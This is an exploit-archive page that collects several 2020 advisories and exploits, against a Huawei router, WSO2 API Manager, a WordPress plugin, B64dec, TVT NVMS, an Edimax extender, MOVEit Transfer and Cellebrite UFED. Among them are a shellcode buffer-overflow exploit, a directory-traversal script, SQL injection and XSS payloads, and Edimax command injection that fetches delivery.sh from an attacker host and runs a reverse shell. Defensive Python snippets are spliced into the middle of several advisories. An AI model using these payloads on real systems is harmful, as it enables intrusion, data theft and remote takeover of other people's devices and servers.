
Huawei HG630 2 Router Authentication Bypass


Huawei HG630 2 Router suffers from an authentication bypass vulnerability.


MD5 | fd50c8ae7408f579a76a676d57803b09

# Title: Huawei HG630 2 Router - Authentication Bypass
# Date: 2020-04-13
# Author: Eslam Medhat
# Vendor Homepage: www.huawei.com
# Version: HG630 V2
# HardwareVersion: VER.B
# CVE: N/A

# PoC:

The default password of this router is the last 8 characters of the
device's serial number, which is printed on the back of the device.

An attacker can obtain the serial number from the web application API
with the following request:

************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm


************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Fri, 01 Jan 2010 09:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141

while(1); /*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/


The last 8 characters of that serial number can then be used to log in to the router.

#Reference:
https://www.youtube.com/watch?v=vOrIL7L_cVc


WSO2 API Manager Carbon Interface 3.0.0 File Delete


WSO2 API Manager Carbon interface version 3.0.0 suffers from an arbitrary file deletion vulnerability.


MD5 | 74ce3c1d9e479270285e3d9f160b56b1

Document Title:
===============
WSO2 API Manager (Delete Extension) Arbitrary File Delete (Path Traversal)


##CVE not assigned yet
##Author : Raki Ben Hamouda
##Security Update : https://apim.docs.wso2.com/en/latest/


Common Vulnerability Scoring System:
====================================
8.5


Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote arbitrary file delete vulnerability has been discovered in the
official WSO2 API Manager Carbon UI product.
The security vulnerability allows a remote attacker with low privileges to
perform authenticated application requests that delete arbitrary system
files.

The vulnerability is located in the
`/carbon/extensions/deleteExtension-ajaxprocessor.jsp` module and its
`extensionName` parameter, which names the extension to delete. Remote
attackers are able to delete arbitrary files, such as configuration files
or database (.db) files, via authenticated POST requests that carry a
crafted path traversal string in "extensionName".

The security risk of the arbitrary delete vulnerability is estimated as
High with a CVSS (Common Vulnerability Scoring System) score of 8.5.
Exploitation of the path traversal vulnerability requires a low-privileged
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

===============================

Error generated by the server in the log file when the file is not found
(this brought my attention ...)

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\commons-dir
    at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.java:531) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisOperation.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(OutInAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.client.OperationClient.execute(OperationClient.java:149) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.removeExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.extensions.stub_4.7.13.jar:?]
    at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extensions.ui_4.7.13.jar:?]
    at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspService(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
    at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [tomcat_9.0.22.wso2v1.jar:?]

* Error displayed in the web browser (response body):

<script type="text/javascript">
CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>



=============================

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName


Server version
3.0.0


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with a
low-privileged web-application user account and with no user interaction.
For a security demonstration, or to reproduce the vulnerability, follow
the information and steps below.


1- The attacker must have access to the Extension component (List, Add,
Delete extensions).
2- The attacker uploads any file with a .jar extension.
3- The attacker intercepts the request that follows and modifies the
parameter with a traversal string:

--- PoC Session Logs [POST] ---

POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt

---------------Returned Headers in Response------------------

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server

WordPress Media Library Assistant 2.81 Local File Inclusion


WordPress Media Library Assistant plugin version 2.81 suffers from a local file inclusion vulnerability.


MD5 | b31e7279051191481d8919615b301f40

# Exploit Title: WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-04-13
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://davidlingren.com/
# Software Link: https://wordpress.org/plugins/media-library-assistant/
# Version: 2.81
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-11731, CVE-2020-11732

----Local File Inclusion----------------------------

There is a local file inclusion vulnerability in the mla-file-downloader.php file, reachable through the mla_download_file parameter. Example:

http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php

Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication.
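A defensive counterpart, added here and not taken from either advisory or from WSO2's or the plugin's code: a server-side guard for the pattern shared by the WSO2 `extensionName` delete above and the `mla_download_file` read here (the same check covers the `../` traversal in the NVMS script further down), where a user-supplied file name may only resolve inside one fixed directory. The directory layout, the `commons-dir.jar` and `INSTALL.txt` files in the demo are constructed, and `resolve_under`, `delete_extension` and `read_download` are hypothetical names, not functions of either product.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (%252e%252e -> %2e%2e -> ..) before inspecting."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_under(base_dir: str, user_name: str,
                  allowed_suffix: Optional[str] = None) -> Optional[str]:
    """Return the absolute path for user_name if it is a plain file name inside base_dir.

    Returns None for everything else: traversal sequences, separators of either
    flavour (the WSO2 target in the advisory runs on Windows, so backslashes count),
    drive letters, NUL bytes, a wrong suffix, or a symlink that escapes the base.
    """
    name = decode_fully(user_name)
    if not name or "\x00" in name or name in (".", ".."):
        return None
    if "/" in name or "\\" in name or ":" in name:
        return None
    if allowed_suffix and not name.lower().endswith(allowed_suffix):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # realpath follows symlinks, so a link planted inside base_dir that points
    # outside it is rejected by the containment check as well.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def delete_extension(ext_dir: str, extension_name: str) -> bool:
    """Hardened shape of a deleteExtension handler: only a .jar directly in ext_dir."""
    target = resolve_under(ext_dir, extension_name, allowed_suffix=".jar")
    if target is None or not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def read_download(download_dir: str, file_name: str) -> Optional[bytes]:
    """Hardened shape of a file-download handler: serve only files directly in download_dir."""
    target = resolve_under(download_dir, file_name)
    if target is None or not os.path.isfile(target):
        return None
    with open(target, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Run both handlers against the traversal strings from the page inside a throwaway tree."""
    with tempfile.TemporaryDirectory() as root:
        ext_dir = os.path.join(root, "repository", "deployment", "server", "registryextensions")
        os.makedirs(ext_dir)
        install_txt = os.path.join(root, "INSTALL.txt")        # constructed victim file
        with open(install_txt, "w") as fh:
            fh.write("installation notes\n")
        good_jar = os.path.join(ext_dir, "commons-dir.jar")     # constructed extension
        open(good_jar, "wb").close()

        traversal_rejected = not delete_extension(ext_dir, "../../../../INSTALL.txt")
        install_txt_survives = os.path.exists(install_txt)
        jar_deleted = delete_extension(ext_dir, "commons-dir.jar") and not os.path.exists(good_jar)
        lfi_rejected = read_download(ext_dir, "..%2F..%2F..%2F..%2FINSTALL.txt") is None
        windows_style_rejected = read_download(ext_dir, "..\\..\\INSTALL.txt") is None
        return {
            "traversal_rejected": traversal_rejected,
            "install_txt_survives": install_txt_survives,
            "jar_deleted": jar_deleted,
            "lfi_rejected": lfi_rejected,
            "windows_style_rejected": windows_style_rejected,
        }


if __name__ == "__main__":
    print(demo())
```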


----Multiple Cross-Site-Scripting-------------------

There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript.

Note that this vulnerability requires authentication.



Tested on Windows 7 Pro SP1 32-bit and WordPress 5.3.2

B64dec 1.1.2 Buffer Overflow


B64dec version 1.1.2 SEH buffer overflow exploit with egg hunter.


MD5 | 3dd86f310efc15f50a3856e183deaae8

# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
# Date: 2020-04-13
# Exploit Author: Andy Bowden
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 10 x86

#Instructions:
# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode.

f = open("crash.txt", "wb")

padding1 = b"ERCDERCD"
padding1 += b"\x90" * 100

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
# cmd=calc.exe exitfunc=thread -f python
payload = b""
payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

egghunter = b"\x8B\xFD" # mov edi,ebp
egghunter += b"\xB8\x45\x52\x43\x44" # mov eax,45525344 ERCD
egghunter += b"\x47" # inc edi
egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xFB" # jne
egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xF7" # jne
egghunter += b"\xFF\xE7" # jmp edi

buf = padding1 + payload
buf += b"\x90" * (580 - len(padding1 + payload))
buf += egghunter
buf += b"\x90" * (620 - len(buf))
buf += b"\x90\x90\xEB\xCE"
buf += b"\x86\x1e\x40" #00401e86

f.write(buf)
f.close()

WSO2 API Manager Carbon Interface 3.0.0 Cross Site Scripting


WSO2 API Manager Carbon interface version 3.0.0 suffers from a persistent cross site scripting vulnerability.


MD5 | bcbebddb3c91837501c4226ddc07e3ff

Document Title:
===============
WSO2 API Manager Stored XSS Vulnerability


Common Vulnerability Scoring System:
====================================
5.4

CVE :
===================
N/A

Security Advisory :
===================
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700


Latest Release after Fixing Vuln:
===================================
V 3.1.0 (https://wso2.com/library/articles/introducing-wso2-api-manager-3-1/)


Author :
==================
Raki Ben Hamouda


Affected Product(s):
====================
WSO2 API Manager Carbon interface V3.0.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A remote stored cross-site scripting vulnerability has been discovered in
the WSO2 API Manager Resource Browser component.
The security vulnerability allows a remote attacker with access to the
"Resource Browser" component to inject malicious code through the Add
Comment feature.

The vulnerability is triggered after sending a POST request to
`/carbon/info/comment-ajaxprocessor.jsp` with the parameters
"comment=targeted&path=%2F".
Remote attackers have the ability to spread malware, to hijack a session
(including a session with higher privileges), or to initiate phishing
attacks.

The security risk of the stored XSS web vulnerability is estimated as
medium with a CVSS (Common Vulnerability Scoring System) score of 5.4.
Exploitation of the stored XSS web vulnerability requires a low-privileged
web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in compromise of the
server.
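An added example, not from the advisory or from WSO2's code, of the two controls that close the hole described above: HTML-escaping the comment at output time, and keeping the session cookie out of `document.cookie`. The renderer reproduces the shape of the comment fragment shown later in the response, the `Set-Cookie` lines checked in the test are constructed, and the function names are hypothetical.

```python
import html
import re
from http.cookies import SimpleCookie
from typing import Dict

# Constructed inputs: the two payloads quoted in this advisory.
IFRAME_PAYLOAD = "<iframe href=http://phishing_url>"
COOKIE_THEFT_PAYLOAD = "<script>alert(document.cookie);</script>"

ACTIVE_CONTENT_RE = re.compile(
    r"<\s*/?\s*(script|iframe|object|embed|svg|img|meta|link|form|base)\b"  # risky elements
    r"|\bon[a-z]+\s*="                                                      # inline event handlers
    r"|javascript\s*:",                                                     # script URLs
    re.IGNORECASE,
)


def looks_like_active_content(comment: str) -> bool:
    """Sanity check on the raw 'comment' parameter, for logging and alerting.

    It is not the fix (output encoding is), but it tells you someone is probing the feature.
    """
    return ACTIVE_CONTENT_RE.search(comment) is not None


def render_comment_vulnerable(comment: str, author: str, posted: str) -> str:
    """The failure mode described above: the stored comment is written into the page verbatim."""
    return "{}\n<br/>\nposted on {} by {}".format(comment, posted, author)


def render_comment_hardened(comment: str, author: str, posted: str) -> str:
    """Output encoding for an HTML text context: every user-controlled value is escaped,
    so the browser displays &lt;iframe ...&gt; as text instead of creating an element."""
    return "{}\n<br/>\nposted on {} by {}".format(
        html.escape(comment, quote=True),
        html.escape(posted, quote=True),
        html.escape(author, quote=True),
    )


def user_markup_survives(rendered: str, template_tags=("<br/>",)) -> bool:
    """True if any '<' other than the renderer's own template tags reaches the output."""
    for tag in template_tags:
        rendered = rendered.replace(tag, "")
    return "<" in rendered


def session_cookie_flags(set_cookie_header: str, name: str = "JSESSIONID") -> Dict[str, object]:
    """Report the attributes that blunt alert(document.cookie)-style theft: HttpOnly keeps
    the session id out of document.cookie, Secure and SameSite limit where it travels."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    morsel = jar[name]
    return {
        "httponly": bool(morsel["httponly"]),
        "secure": bool(morsel["secure"]),
        "samesite": morsel.get("samesite", "") or "",
    }
```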


Request Method:
[+] POST

Module:
[+] /carbon/info/comment-ajaxprocessor.jsp

Parameters:
[+] comment=admincomment
[+] path=%2F
=======================================

POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close

comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F

==============================

HTTP/1.1 200

X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144


// The response body includes the attacker's malicious script:


<a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right">&nbsp;</a>

<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker



Proof of Concept (PoC):
=======================

// Let's suppose we're attacking an admin with higher privileges

1- The attacker opens their account
2- adds an arbitrary comment
3- intercepts the request
4- adds the malicious script to the comment
5- The admin accesses their account; when they go to add a comment, the
malicious script gets executed

===> Admin account compromised



===============================================================================



Example malicious script:


<script>
alert(document.cookie);
</script>



===============================================================================

TVT NVMS 1000 Directory Traversal


TVT NVMS 1000 suffers from a directory traversal vulnerability.


MD5 | 801d83449f54d4e39592e24a359a856d

# Exploit Title: TVT NVMS 1000 - Directory Traversal 
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import requests
import time

if len(sys.argv) != 4:
    print("")
    print("Usage : python exploit.py url filename outputname")
    print("Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini")
    print("")
else:
    traversal = "../../../../../../../../../../../../../"
    filename = sys.argv[2]
    url = sys.argv[1] + traversal + filename
    outputname = sys.argv[3]
    content = requests.get(url)

    if content.status_code == 200:
        print("")
        print("Directory Traversal Succeeded")
        time.sleep(3)
        print("")
        print("Saving Output")
        # write the retrieved file contents to the requested output file
        with open(outputname, "w") as output_write:
            output_write.write(content.text)
    else:
        print("Host not vulnerable to Directory Traversal!")

Edimax Technology EW-7438RPn-v3 Mini 1.27 Remote Code Execution


Edimax Technology EW-7438RPn-v3 Mini version 1.27 suffers from a remote code execution vulnerability.


MD5 | b44c20b286031cbea57138ae55006080

# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
# Date: 2020-04-13
# Exploit Author: Wadeek
# Hardware Version: EW-7438RPn-v3 Mini
# Firmware Version: 1.23 / 1.27
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip

== Shodan Dorks ==

(Setup Mode) "HTTP/1.0 302 Redirect""Server: Boa/0.94.14rc21""http://(null)/index.asp"
(Unsetup Mode) "HTTP/1.1 401 Unauthorized""Server: Boa/0.94.14rc21""Default Name:admin Password:1234"

== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==

GET /wizard_reboot.asp
showSSID = "<WIRELESS-NAME>";
document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>');

== Command Execution * ==

(Setup Mode)
curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

(Unsetup Mode with default password)
curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

== Cross-Site Request Forgery -> Command Execution * ==

<form action="http://edimaxext.setup/goform/mp" method="POST">
<input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh">
<input type="submit" value="">
</form>

* [ delivery.sh ]
--------------------------------------------------------------------------------------
# (msfvenom) linux/mipsbe/shell/reverse_tcp
cd /tmp/
busybox wget -O reverse http://<LHOST>/reverse
busybox chmod +x reverse
./reverse &
--------------------------------------------------------------------------------------

MOVEit Transfer 11.1.1 SQL Injection


MOVEit Transfer version 11.1.1 suffers from a remote SQL injection vulnerability.


MD5 | a671253246bf71a9a6f5c93328b60d5d

# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection 
# Google Dork: inurl:human.aspx intext:moveit
# Date: 2020-04-12
# Exploit Authors: Aviv Beniash, Noam Moshe
# Vendor Homepage: https://www.ipswitch.com/
# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
# CVE : CVE-2019-16383
#
# Related Resources:
# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2019-16383

# Description:
# The API call for revoking logon tokens is vulnerable to a
# time-based blind SQL injection via the 'token' parameter.

# MSSQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

token='; WAITFOR DELAY '0:0:10'--


# MySQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

token=' OR SLEEP(10);
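An added example, not part of the advisory or of MOVEit Transfer, showing why the 'token' payloads above work against concatenated SQL and why a parameterised statement is the fix. A small sqlite3 table stands in for the logon-token store (constructed); sqlite has neither SLEEP nor WAITFOR and refuses stacked statements, so the vulnerable path fails to compile instead of sleeping, which is enough to show the injected text reached the SQL compiler. Function names are hypothetical.

```python
import sqlite3
from typing import Tuple

# Constructed copies of the two request bodies quoted above.
MSSQL_PAYLOAD = "'; WAITFOR DELAY '0:0:10'--"
MYSQL_PAYLOAD = "' OR SLEEP(10);"


def make_token_db() -> sqlite3.Connection:
    """Constructed stand-in for the logon-token store behind /api/v1/token/revoke."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logon_tokens (token TEXT PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO logon_tokens VALUES (?, ?)",
                     [("tok-alice-1", "alice"), ("tok-bob-1", "bob")])
    conn.commit()
    return conn


def revoke_token_vulnerable(conn: sqlite3.Connection, token: str) -> int:
    """String concatenation (the bug class): the quote in the payload closes the
    literal and everything after it is compiled as SQL. Returns rows deleted."""
    sql = "DELETE FROM logon_tokens WHERE token = '%s'" % token
    return conn.execute(sql).rowcount


def revoke_token_hardened(conn: sqlite3.Connection, token: str) -> int:
    """Parameterised statement: the driver binds the payload as one opaque string,
    so it is compared against the token column and matches nothing. Returns rows deleted."""
    return conn.execute("DELETE FROM logon_tokens WHERE token = ?", (token,)).rowcount


def demo(payload: str) -> Tuple[str, int, int]:
    """Feed one payload to both code paths on a fresh table.

    Returns (vulnerable_outcome, rows_removed_by_hardened_path, rows_remaining).
    On sqlite the vulnerable path raises ("no such function: SLEEP" or "only one
    statement at a time"); on MSSQL/MySQL the same statement would delay ten seconds.
    """
    conn = make_token_db()
    try:
        revoke_token_vulnerable(conn, payload)
        vulnerable_outcome = "executed without error"
    except (sqlite3.Error, sqlite3.Warning) as exc:
        vulnerable_outcome = "payload compiled as SQL: %s" % exc
    hardened_rows = revoke_token_hardened(conn, payload)
    remaining = conn.execute("SELECT COUNT(*) FROM logon_tokens").fetchone()[0]
    conn.close()
    return vulnerable_outcome, hardened_rows, remaining


if __name__ == "__main__":
    for name, payload in (("MSSQL", MSSQL_PAYLOAD), ("MySQL", MYSQL_PAYLOAD)):
        print(name, demo(payload))
```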


Cellebrite UFED 7.29 Hardcoded ADB Authentication Keys


Cellebrite UFED versions 5.0 through 7.29 use four hardcoded RSA private keys to authenticate to the ADB daemon on target devices. Extracted keys can be used to place evidence onto target devices when performing a forensic extraction.


MD5 | 7843cd98ee3e04e6fea5d8750b053894

KL-001-2020-001 : Cellebrite Hardcoded ADB Authentication Keys

Title: Cellebrite Hardcoded ADB Authentication Keys
Advisory ID: KL-001-2020-001
Publication Date: 2020.04.13
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2020-001.txt


1. Vulnerability Details

Affected Vendor: Cellebrite
Affected Product: UFED
Affected Version: 5.0 - 7.29
Platform: Embedded Windows
CWE Classification: CWE-321: Use of hardcoded cryptographic keys
CVE ID: CVE-2020-11723


2. Vulnerability Description

Cellebrite UFED uses four hardcoded RSA private keys to
authenticate to the ADB daemon on target devices. Extracted
keys can be used to place evidence onto target devices when
performing a forensic extraction.


3. Technical Description

The AndroidLib.dll file will be found in the Program Files
directory at the following path:
C:\Program Files\Cellebrite Mobile Synchronization\UFED Touch\AndroidLib.dll

This file contains the code used to authenticate to the ADB
daemon on devices to be forensically imaged. This library
relies on the CryptImportKey function to import a private key
for use during this operation. The bytes used to represent the
key are hardcoded into the AndroidLib.dll file. The file may be
protected by Themida but can be recovered through deobfuscation
techniques.

The CryptImportKey function uses a private key structure called
MS PRIVATEKEYBLOB. Keys that follow this format can be found by
searching for "RSA2" as US-ASCII values inside of the
AndroidLib.dll file. There are three keys present between
versions 5.0 and 7.1.

0x6c598 952 ?PrivateKey1@ADBAuth@@0QBEB
Ordinal_952 XREF[2]: Entry Point(*), 100867b4(*)
?PrivateKey1@ADBAuth@@0QBEB
1006c598 07 ?? 07h
1006c599 02 ?? 02h
1006c59a 00 ?? 00h
1006c59b 00 ?? 00h
1006c59c 00 ?? 00h
1006c59d a4 ?? A4h
1006c59e 00 ?? 00h
1006c59f 00 ?? 00h
1006c5a0 52 ?? 52h R
1006c5a1 53 ?? 53h S
1006c5a2 41 ?? 41h A
1006c5a3 32 ?? 32h 2
...


0x6ca30 953 ?PrivateKey2@ADBAuth@@0QBEB
Ordinal_953 XREF[2]: Entry Point(*), 100867b8(*)
?PrivateKey2@ADBAuth@@0QBEB
1006ca30 07 ?? 07h
1006ca31 02 ?? 02h
1006ca32 00 ?? 00h
1006ca33 00 ?? 00h
1006ca34 00 ?? 00h
1006ca35 a4 ?? A4h
1006ca36 00 ?? 00h
1006ca37 00 ?? 00h
1006ca38 52 ?? 52h R
1006ca39 53 ?? 53h S
1006ca3a 41 ?? 41h A
1006ca3b 32 ?? 32h 2
...


0x6cec8 954 ?PrivateKey3@ADBAuth@@0QBEB
Ordinal_954 XREF[2]: Entry Point(*), 100867bc(*)
